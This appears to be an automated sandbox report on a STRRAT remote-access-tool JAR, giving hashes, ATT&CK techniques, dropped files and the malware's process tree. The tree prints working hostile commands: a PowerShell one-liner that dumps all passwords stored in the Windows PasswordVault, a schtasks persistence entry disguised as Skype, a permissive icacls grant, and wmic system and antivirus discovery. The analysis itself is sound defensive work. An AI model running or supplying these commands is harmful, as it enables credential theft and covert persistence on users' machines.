Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-05-2024 01:39

General

  • Target

    f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151.jar

  • Size

    481KB

  • MD5

    0bd6891d55ba2fc4b16da35243710fc0

  • SHA1

    148901af7e43cd04bfaaa393d1abaf0f91e29f5e

  • SHA256

    f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151

  • SHA512

    1ca26438fd51937b1091883198309518984eb4f1bdc3de3fbaca1ac5d63b2c31a5ab79f3d901d9e2a0e90739ab2b144f74770be4daaf7b73845b4d6fb3016078

  • SSDEEP

    12288:ublFMKeQSPEXjwVfgFJRb5hokCl24Lpty4qKcV:uxFMlwofcpKjy4S

Malware Config

Signatures

  • STRRAT

    STRRAT is a remote access tool than can steal credentials and log keystrokes.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151.jar
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\system32\icacls.exe
      C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
      2⤵
      • Modifies file permissions
      PID:2824
    • C:\Program Files\Java\jre-1.8\bin\java.exe
      "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar "C:\Users\Admin\f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151.jar"
      2⤵
      • Drops startup file
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3440
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151.jar"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Windows\system32\schtasks.exe
          schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151.jar"
          4⤵
          • Creates scheduled task(s)
          PID:2496
      • C:\Program Files\Java\jre-1.8\bin\java.exe
        "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar "C:\Users\Admin\AppData\Roaming\f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151.jar"
        3⤵
        • Loads dropped DLL
        • Accesses Microsoft Outlook profiles
        • Suspicious use of WriteProcessMemory
        • outlook_office_path
        • outlook_win_path
        PID:5088
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1344
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2036
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get caption,OSArchitecture /format:list"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2380
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get caption,OSArchitecture /format:list
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1872
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get version /format:list"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4652
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get version /format:list
            5⤵
              PID:3380
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c "wmic /node:localhost /namespace:'\\root\securitycenter2' path antivirusproduct get displayname /format:list"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3872
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic /node:localhost /namespace:'\\root\securitycenter2' path antivirusproduct get displayname /format:list
              5⤵
                PID:4856
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4348

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Scheduled Task/Job

      1
      T1053

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Defense Evasion

      File and Directory Permissions Modification

      1
      T1222

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Collection

      Email Collection

      1
      T1114

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
        Filesize

        46B

        MD5

        b10af38cf8f0206acdab7494b5ff1282

        SHA1

        7be5fc9023673a4d14aa35d2cc4ec02c0bcff662

        SHA256

        5068253c40efc45ac3187872ddf490597f0a581d6954532c5342ae04522d12a9

        SHA512

        1b172624a12527ddef01911477de185b9efd29311916e88a59a6e253369c69e1250864346e9b911f6b67d9fab01caa08354ed8626ea38cf9e7f9b75193143435

      • C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_efkzxmlv.ars.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\jna-63116079\jna5739504394534055800.dll
        Filesize

        241KB

        MD5

        e02979ecd43bcc9061eb2b494ab5af50

        SHA1

        3122ac0e751660f646c73b10c4f79685aa65c545

        SHA256

        a66959bec2ef5af730198db9f3b3f7cab0d4ae70ce01bec02bf1d738e6d1ee7a

        SHA512

        1e6f7dcb6a557c9b896412a48dd017c16f7a52fa2b9ab513593c9ecd118e86083979821ca7a3e2f098ee349200c823c759cec6599740dd391cb5f354dc29b372

      • C:\Users\Admin\AppData\Local\Temp\sqlite-3.14.2.1-f034a295-12da-4c22-9a81-f77d3cdb6bdd-sqlitejdbc.dll
        Filesize

        914KB

        MD5

        bcd42d2959eadc64dc225cf800ce3c90

        SHA1

        f19981d3c3987259edf9874aaccaaec21616b03d

        SHA256

        05a8557f5d197aca468f5272a2a869293cb11c2f0ab4839a17f144f9a5d0b77d

        SHA512

        428ba3a76543e726b58ea334b6ea9538c7230592cc29fa564fdb44fdb4e2998820514af70b10b80f77c8f1554f63e1a4822ef8db095191956652454d220bc167

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1337824034-2731376981-3755436523-1000\83aa4cc77f591dfc2374580bbd95f6ba_6833eb7b-8d4b-4cdd-9502-9bbf7fc1cf9f
        Filesize

        45B

        MD5

        c8366ae350e7019aefc9d1e6e6a498c6

        SHA1

        5731d8a3e6568a5f2dfbbc87e3db9637df280b61

        SHA256

        11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238

        SHA512

        33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd

      • C:\Users\Admin\f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151.jar
        Filesize

        481KB

        MD5

        0bd6891d55ba2fc4b16da35243710fc0

        SHA1

        148901af7e43cd04bfaaa393d1abaf0f91e29f5e

        SHA256

        f0699de74b6274011f91036c3daafc4aae3e49e2210be14ea06a8d478248c151

        SHA512

        1ca26438fd51937b1091883198309518984eb4f1bdc3de3fbaca1ac5d63b2c31a5ab79f3d901d9e2a0e90739ab2b144f74770be4daaf7b73845b4d6fb3016078

      • C:\Users\Admin\lib\jna-5.5.0.jar
        Filesize

        1.4MB

        MD5

        acfb5b5fd9ee10bf69497792fd469f85

        SHA1

        0e0845217c4907822403912ad6828d8e0b256208

        SHA256

        b308faebfe4ed409de8410e0a632d164b2126b035f6eacff968d3908cafb4d9e

        SHA512

        e52575f58a195ceb3bd16b9740eadf5bc5b1d4d63c0734e8e5fd1d1776aa2d068d2e4c7173b83803f95f72c0a6759ae1c9b65773c734250d4cfcdf47a19f82aa

      • C:\Users\Admin\lib\jna-platform-5.5.0.jar
        Filesize

        2.6MB

        MD5

        2f4a99c2758e72ee2b59a73586a2322f

        SHA1

        af38e7c4d0fc73c23ecd785443705bfdee5b90bf

        SHA256

        24d81621f82ac29fcdd9a74116031f5907a2343158e616f4573bbfa2434ae0d5

        SHA512

        b860459a0d3bf7ccb600a03aa1d2ac0358619ee89b2b96ed723541e182b6fdab53aefef7992acb4e03fca67aa47cbe3907b1e6060a60b57ed96c4e00c35c7494

      • C:\Users\Admin\lib\sqlite-jdbc-3.14.2.1.jar
        Filesize

        4.1MB

        MD5

        b33387e15ab150a7bf560abdc73c3bec

        SHA1

        66b8075784131f578ef893fd7674273f709b9a4c

        SHA256

        2eae3dea1c3dde6104c49f9601074b6038ff6abcf3be23f4b56f6720a4f6a491

        SHA512

        25cfb0d6ce35d0bcb18527d3aa12c63ecb2d9c1b8b78805d1306e516c13480b79bb0d74730aa93bd1752f9ac2da9fdd51781c48844cea2fd52a06c62852c8279

      • C:\Users\Admin\lib\system-hook-3.5.jar
        Filesize

        772KB

        MD5

        e1aa38a1e78a76a6de73efae136cdb3a

        SHA1

        c463da71871f780b2e2e5dba115d43953b537daf

        SHA256

        2ddda8af6faef8bde46acf43ec546603180bcf8dcb2e5591fff8ac9cd30b5609

        SHA512

        fee16fe9364926ec337e52f551fd62ed81984808a847de2fd68ff29b6c5da0dcc04ef6d8977f0fe675662a7d2ea1065cdcdd2a5259446226a7c7c5516bd7d60d

      • memory/2812-111-0x00000182EC4E0000-0x00000182EC4F0000-memory.dmp
        Filesize

        64KB

      • memory/2812-194-0x00000182EC060000-0x00000182EC2D0000-memory.dmp
        Filesize

        2.4MB

      • memory/2812-28-0x00000182EC340000-0x00000182EC350000-memory.dmp
        Filesize

        64KB

      • memory/2812-30-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-32-0x00000182EC360000-0x00000182EC370000-memory.dmp
        Filesize

        64KB

      • memory/2812-27-0x00000182EC330000-0x00000182EC340000-memory.dmp
        Filesize

        64KB

      • memory/2812-37-0x00000182EC380000-0x00000182EC390000-memory.dmp
        Filesize

        64KB

      • memory/2812-40-0x00000182EC3A0000-0x00000182EC3B0000-memory.dmp
        Filesize

        64KB

      • memory/2812-109-0x00000182EC3E0000-0x00000182EC3F0000-memory.dmp
        Filesize

        64KB

      • memory/2812-38-0x00000182EC370000-0x00000182EC380000-memory.dmp
        Filesize

        64KB

      • memory/2812-42-0x00000182EC3B0000-0x00000182EC3C0000-memory.dmp
        Filesize

        64KB

      • memory/2812-44-0x00000182EC060000-0x00000182EC2D0000-memory.dmp
        Filesize

        2.4MB

      • memory/2812-45-0x00000182EC3C0000-0x00000182EC3D0000-memory.dmp
        Filesize

        64KB

      • memory/2812-52-0x00000182EC3D0000-0x00000182EC3E0000-memory.dmp
        Filesize

        64KB

      • memory/2812-51-0x00000182EC2D0000-0x00000182EC2E0000-memory.dmp
        Filesize

        64KB

      • memory/2812-57-0x00000182EC3E0000-0x00000182EC3F0000-memory.dmp
        Filesize

        64KB

      • memory/2812-56-0x00000182EC2F0000-0x00000182EC300000-memory.dmp
        Filesize

        64KB

      • memory/2812-55-0x00000182EC2E0000-0x00000182EC2F0000-memory.dmp
        Filesize

        64KB

      • memory/2812-61-0x00000182EC400000-0x00000182EC410000-memory.dmp
        Filesize

        64KB

      • memory/2812-60-0x00000182EC3F0000-0x00000182EC400000-memory.dmp
        Filesize

        64KB

      • memory/2812-59-0x00000182EC300000-0x00000182EC310000-memory.dmp
        Filesize

        64KB

      • memory/2812-64-0x00000182EC310000-0x00000182EC320000-memory.dmp
        Filesize

        64KB

      • memory/2812-66-0x00000182EC410000-0x00000182EC420000-memory.dmp
        Filesize

        64KB

      • memory/2812-72-0x00000182EC440000-0x00000182EC450000-memory.dmp
        Filesize

        64KB

      • memory/2812-71-0x00000182EC430000-0x00000182EC440000-memory.dmp
        Filesize

        64KB

      • memory/2812-69-0x00000182EC420000-0x00000182EC430000-memory.dmp
        Filesize

        64KB

      • memory/2812-68-0x00000182EC320000-0x00000182EC330000-memory.dmp
        Filesize

        64KB

      • memory/2812-77-0x00000182EC450000-0x00000182EC460000-memory.dmp
        Filesize

        64KB

      • memory/2812-78-0x00000182EC460000-0x00000182EC470000-memory.dmp
        Filesize

        64KB

      • memory/2812-76-0x00000182EC350000-0x00000182EC360000-memory.dmp
        Filesize

        64KB

      • memory/2812-75-0x00000182EC340000-0x00000182EC350000-memory.dmp
        Filesize

        64KB

      • memory/2812-74-0x00000182EC330000-0x00000182EC340000-memory.dmp
        Filesize

        64KB

      • memory/2812-82-0x00000182EC470000-0x00000182EC480000-memory.dmp
        Filesize

        64KB

      • memory/2812-81-0x00000182EC360000-0x00000182EC370000-memory.dmp
        Filesize

        64KB

      • memory/2812-87-0x00000182EC390000-0x00000182EC3A0000-memory.dmp
        Filesize

        64KB

      • memory/2812-86-0x00000182EC370000-0x00000182EC380000-memory.dmp
        Filesize

        64KB

      • memory/2812-89-0x00000182EC480000-0x00000182EC490000-memory.dmp
        Filesize

        64KB

      • memory/2812-88-0x00000182EC3A0000-0x00000182EC3B0000-memory.dmp
        Filesize

        64KB

      • memory/2812-85-0x00000182EC380000-0x00000182EC390000-memory.dmp
        Filesize

        64KB

      • memory/2812-90-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-92-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-97-0x00000182EC4A0000-0x00000182EC4B0000-memory.dmp
        Filesize

        64KB

      • memory/2812-96-0x00000182EC490000-0x00000182EC4A0000-memory.dmp
        Filesize

        64KB

      • memory/2812-95-0x00000182EC3B0000-0x00000182EC3C0000-memory.dmp
        Filesize

        64KB

      • memory/2812-100-0x00000182EC4B0000-0x00000182EC4C0000-memory.dmp
        Filesize

        64KB

      • memory/2812-99-0x00000182EC3C0000-0x00000182EC3D0000-memory.dmp
        Filesize

        64KB

      • memory/2812-103-0x00000182EC3D0000-0x00000182EC3E0000-memory.dmp
        Filesize

        64KB

      • memory/2812-104-0x00000182EC4C0000-0x00000182EC4D0000-memory.dmp
        Filesize

        64KB

      • memory/2812-108-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-23-0x00000182EC320000-0x00000182EC330000-memory.dmp
        Filesize

        64KB

      • memory/2812-113-0x00000182EC500000-0x00000182EC510000-memory.dmp
        Filesize

        64KB

      • memory/2812-117-0x00000182EC510000-0x00000182EC520000-memory.dmp
        Filesize

        64KB

      • memory/2812-116-0x00000182EC400000-0x00000182EC410000-memory.dmp
        Filesize

        64KB

      • memory/2812-115-0x00000182EC3F0000-0x00000182EC400000-memory.dmp
        Filesize

        64KB

      • memory/2812-142-0x00000182EC490000-0x00000182EC4A0000-memory.dmp
        Filesize

        64KB

      • memory/2812-29-0x00000182EC350000-0x00000182EC360000-memory.dmp
        Filesize

        64KB

      • memory/2812-39-0x00000182EC390000-0x00000182EC3A0000-memory.dmp
        Filesize

        64KB

      • memory/2812-121-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-123-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-125-0x00000182EC520000-0x00000182EC530000-memory.dmp
        Filesize

        64KB

      • memory/2812-124-0x00000182EC410000-0x00000182EC420000-memory.dmp
        Filesize

        64KB

      • memory/2812-130-0x00000182EC530000-0x00000182EC540000-memory.dmp
        Filesize

        64KB

      • memory/2812-129-0x00000182EC440000-0x00000182EC450000-memory.dmp
        Filesize

        64KB

      • memory/2812-128-0x00000182EC430000-0x00000182EC440000-memory.dmp
        Filesize

        64KB

      • memory/2812-127-0x00000182EC420000-0x00000182EC430000-memory.dmp
        Filesize

        64KB

      • memory/2812-134-0x00000182EC540000-0x00000182EC550000-memory.dmp
        Filesize

        64KB

      • memory/2812-133-0x00000182EC460000-0x00000182EC470000-memory.dmp
        Filesize

        64KB

      • memory/2812-132-0x00000182EC450000-0x00000182EC460000-memory.dmp
        Filesize

        64KB

      • memory/2812-136-0x00000182EC470000-0x00000182EC480000-memory.dmp
        Filesize

        64KB

      • memory/2812-137-0x00000182EC550000-0x00000182EC560000-memory.dmp
        Filesize

        64KB

      • memory/2812-139-0x00000182EC480000-0x00000182EC490000-memory.dmp
        Filesize

        64KB

      • memory/2812-140-0x00000182EC560000-0x00000182EC570000-memory.dmp
        Filesize

        64KB

      • memory/2812-143-0x00000182EC4A0000-0x00000182EC4B0000-memory.dmp
        Filesize

        64KB

      • memory/2812-144-0x00000182EC570000-0x00000182EC580000-memory.dmp
        Filesize

        64KB

      • memory/2812-112-0x00000182EC4F0000-0x00000182EC500000-memory.dmp
        Filesize

        64KB

      • memory/2812-147-0x00000182EC4B0000-0x00000182EC4C0000-memory.dmp
        Filesize

        64KB

      • memory/2812-148-0x00000182EC580000-0x00000182EC590000-memory.dmp
        Filesize

        64KB

      • memory/2812-149-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-151-0x00000182EC4C0000-0x00000182EC4D0000-memory.dmp
        Filesize

        64KB

      • memory/2812-152-0x00000182EC590000-0x00000182EC5A0000-memory.dmp
        Filesize

        64KB

      • memory/2812-156-0x00000182EC4F0000-0x00000182EC500000-memory.dmp
        Filesize

        64KB

      • memory/2812-158-0x00000182EC5A0000-0x00000182EC5B0000-memory.dmp
        Filesize

        64KB

      • memory/2812-157-0x00000182EC500000-0x00000182EC510000-memory.dmp
        Filesize

        64KB

      • memory/2812-155-0x00000182EC4E0000-0x00000182EC4F0000-memory.dmp
        Filesize

        64KB

      • memory/2812-154-0x00000182EC4D0000-0x00000182EC4E0000-memory.dmp
        Filesize

        64KB

      • memory/2812-160-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-162-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-163-0x00000182EC510000-0x00000182EC520000-memory.dmp
        Filesize

        64KB

      • memory/2812-164-0x00000182EC5B0000-0x00000182EC5C0000-memory.dmp
        Filesize

        64KB

      • memory/2812-166-0x00000182EC520000-0x00000182EC530000-memory.dmp
        Filesize

        64KB

      • memory/2812-167-0x00000182EC5C0000-0x00000182EC5D0000-memory.dmp
        Filesize

        64KB

      • memory/2812-169-0x00000182EC530000-0x00000182EC540000-memory.dmp
        Filesize

        64KB

      • memory/2812-170-0x00000182EC5D0000-0x00000182EC5E0000-memory.dmp
        Filesize

        64KB

      • memory/2812-179-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-180-0x00000182EC540000-0x00000182EC550000-memory.dmp
        Filesize

        64KB

      • memory/2812-183-0x00000182EC550000-0x00000182EC560000-memory.dmp
        Filesize

        64KB

      • memory/2812-184-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-191-0x00000182EC560000-0x00000182EC570000-memory.dmp
        Filesize

        64KB

      • memory/2812-21-0x00000182EC310000-0x00000182EC320000-memory.dmp
        Filesize

        64KB

      • memory/2812-192-0x00000182EC5E0000-0x00000182EC5F0000-memory.dmp
        Filesize

        64KB

      • memory/2812-193-0x00000182EA6D0000-0x00000182EA6D1000-memory.dmp
        Filesize

        4KB

      • memory/2812-195-0x00000182EC2D0000-0x00000182EC2E0000-memory.dmp
        Filesize

        64KB

      • memory/2812-110-0x00000182EC4D0000-0x00000182EC4E0000-memory.dmp
        Filesize

        64KB

      • memory/2812-2-0x00000182EC060000-0x00000182EC2D0000-memory.dmp
        Filesize

        2.4MB

      • memory/2812-19-0x00000182EC300000-0x00000182EC310000-memory.dmp
        Filesize

        64KB

      • memory/2812-13-0x00000182EC2D0000-0x00000182EC2E0000-memory.dmp
        Filesize

        64KB

      • memory/2812-16-0x00000182EC2E0000-0x00000182EC2F0000-memory.dmp
        Filesize

        64KB

      • memory/2812-17-0x00000182EC2F0000-0x00000182EC300000-memory.dmp
        Filesize

        64KB

      • memory/3440-276-0x0000014DDAB60000-0x0000014DDAB61000-memory.dmp
        Filesize

        4KB

      • memory/5088-379-0x000001B832150000-0x000001B832151000-memory.dmp
        Filesize

        4KB

      • memory/5088-429-0x000001B832150000-0x000001B832151000-memory.dmp
        Filesize

        4KB

      • memory/5088-447-0x0000000061680000-0x000000006176D000-memory.dmp
        Filesize

        948KB